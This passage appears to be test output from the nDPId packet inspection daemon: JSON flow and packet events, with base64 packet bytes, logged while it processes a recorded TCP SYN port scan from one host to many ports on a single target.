-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsEIwAACsGDOesEAAIQA2GNIzSD6XdUoMYAAAAAGACEAAY6gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsTAEAADYGxnGsEAAIQA2GNIzSFqjdUoMYAAAAAGACDAAV5wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsnkwAAC0GfSasEAAIQA2GNIzSBBDdUoMYAAAAAGACCAAsfwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsFfcAACcGC3ysEAAIQA2GNIzSAGPdUoMYAAAAAGACEAAoLAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsSqoAACYG18isEAAIQA2GNIzSFUDdUoMYAAAAAGACDAAXTwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsviQAACgGYk6sEAAIQA2GNIzSatzdUoMYAAAAAGACBADJsgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsLroAACwG7bisEAAIQA2GNIzSEA\/dUoMYAAAAAGACBAAkgAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsCv8AAC4GD3SsEAAIQA2GNIzSTUTdUoMYAAAAAGACDADfSgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/JoAACYGJdisEAAIQA2GNIzSHnjdUoMYAAAAAGACDAAOFwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsnFAAAC4GfiKsEAAIQA2GNIzSBD\/dUoMYAAAAAGACDAAoUAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAs4+0AADUGL4WsEAAIQA2GNIzSBoLdUoMYAAAAAGACCAAqDQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsav8AADsGonOsEAAIQA2GNIzTDuHdU4MZAAAAAGACEAAZqwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/dIAACcGI6CsEAAIQA2GNIzTDvPdU4MZAAAAAGACEAAZmQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs8f8AACcGL3OsEAAIQA2GNIzTFf\/dU4MZAAAAAGACEAASjQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsf98AADQGlJOsEAAIQA2GNIzTB9HdU4MZAAAAAGACBAAsuwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs4wcAACgGPWusEAAIQA2GNIzTPoHdU4MZAAAAAGACBAD2CgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsxOgAACoGWYqsEAAIQA2GNIzTECHdU4MZAAAAAGACDAAcawAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsfUMAAC0Gni+sEAAIQA2GNIzTCvvdU4MZAAAAAGACCAAlkQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsdR4AACkGqlSsEAAIQA2GNIzTDZTdU4MZAAAAAGACCAAi+AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs2GAAACkGRxKsEAAIQA2GNIzTB\/7dU4MZAAAAAGACCAAojgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAse2wAADEGnAasEAAIQA2GNIzTCdrdU4MZAAAAAGACCAAmsgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsoZYAADAGdtysEAAIQA2GNIzTBCTdU4MZAAAAAGACBAAwaAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsB5YAACkGF92sEAAIQA2GNIzTBBfdU4MZAAAAAGACCAAsdQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058906,"pkt":"ACYLMQczACWzv5HuCABFAAAsekUAAC8Gny2sEAAIQA2GNIzTH5bdU4MZAAAAAGACEAAI9gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058906,"pkt":"ACYLMQczACWzv5HuCABFAAAsvlsAAC0GXResEAAIQA2GNIzTBILdU4MZAAAAAGACCAAsCgAAAgQFtA=="} 